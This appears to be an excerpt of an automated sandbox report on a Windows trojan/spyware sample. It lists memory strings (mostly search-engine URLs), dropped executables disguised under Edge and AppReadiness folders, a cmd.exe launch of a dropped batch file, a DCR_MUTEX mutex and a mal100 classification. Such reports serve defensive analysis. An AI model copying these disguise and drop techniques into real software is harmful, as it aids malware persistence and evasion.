yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess Stats: CPU usage > 49%
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E96FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00E96FAA
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Windows\AppReadiness\db08104604e511Jump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9848E0_2_00E9848E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E940FE0_2_00E940FE
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EA00B70_2_00EA00B7
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EA40880_2_00EA4088
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EB51C90_2_00EB51C9
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EA71530_2_00EA7153
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E932F70_2_00E932F7
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EA62CA0_2_00EA62CA
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EA43BF0_2_00EA43BF
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9F4610_2_00E9F461
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EBD4400_2_00EBD440
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9C4260_2_00E9C426
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EA77EF0_2_00EA77EF
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EBD8EE0_2_00EBD8EE
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9286B0_2_00E9286B
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EC19F40_2_00EC19F4
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9E9B70_2_00E9E9B7
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EA6CDC0_2_00EA6CDC
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EA3E0B0_2_00EA3E0B
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E9EFE20_2_00E9EFE2
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EB4F9A0_2_00EB4F9A
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeCode function: 4_2_00007FFD9B7D0D4F4_2_00007FFD9B7D0D4F
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeCode function: 4_2_00007FFD9B7D0E434_2_00007FFD9B7D0E43
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeCode function: 4_2_00007FFD9BBE926F4_2_00007FFD9BBE926F
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeCode function: 4_2_00007FFD9BBE04254_2_00007FFD9BBE0425
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeCode function: 9_2_00007FFD9BA20D4F9_2_00007FFD9BA20D4F
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeCode function: 9_2_00007FFD9BA20E439_2_00007FFD9BA20E43
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeCode function: 9_2_00007FFD9BE320DB9_2_00007FFD9BE320DB
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeCode function: 9_2_00007FFD9BE3947F9_2_00007FFD9BE3947F
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeCode function: 9_2_00007FFD9BE304259_2_00007FFD9BE30425
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: String function: 00EAEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: String function: 00EAEC50 appears 56 times
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: String function: 00EAF5F0 appears 31 times
                                    Source: 8k1e14tjcx.exe, 00000000.00000003.1701368630.000000000342C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs 8k1e14tjcx.exe
                                    Source: 8k1e14tjcx.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 8k1e14tjcx.exe
                                    Source: 8k1e14tjcx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: ChainFontruntimeCrt.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: OfficeClickToRun.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe2.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/267@1/1
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00E96C74 GetLastError,FormatMessageW,0_2_00E96C74
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00EAA6C2
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\Desktop\HZSnKfqJ.logJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-7QSmDzANvDkQAgXpPhWh
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile created: C:\Users\user\AppData\Local\Temp\yHMm05yQcLJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCommand line argument: sfxname0_2_00EADF1E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCommand line argument: sfxstime0_2_00EADF1E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCommand line argument: STARTDLG0_2_00EADF1E
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCommand line argument: xz0_2_00EADF1E
                                    Source: 8k1e14tjcx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 8k1e14tjcx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
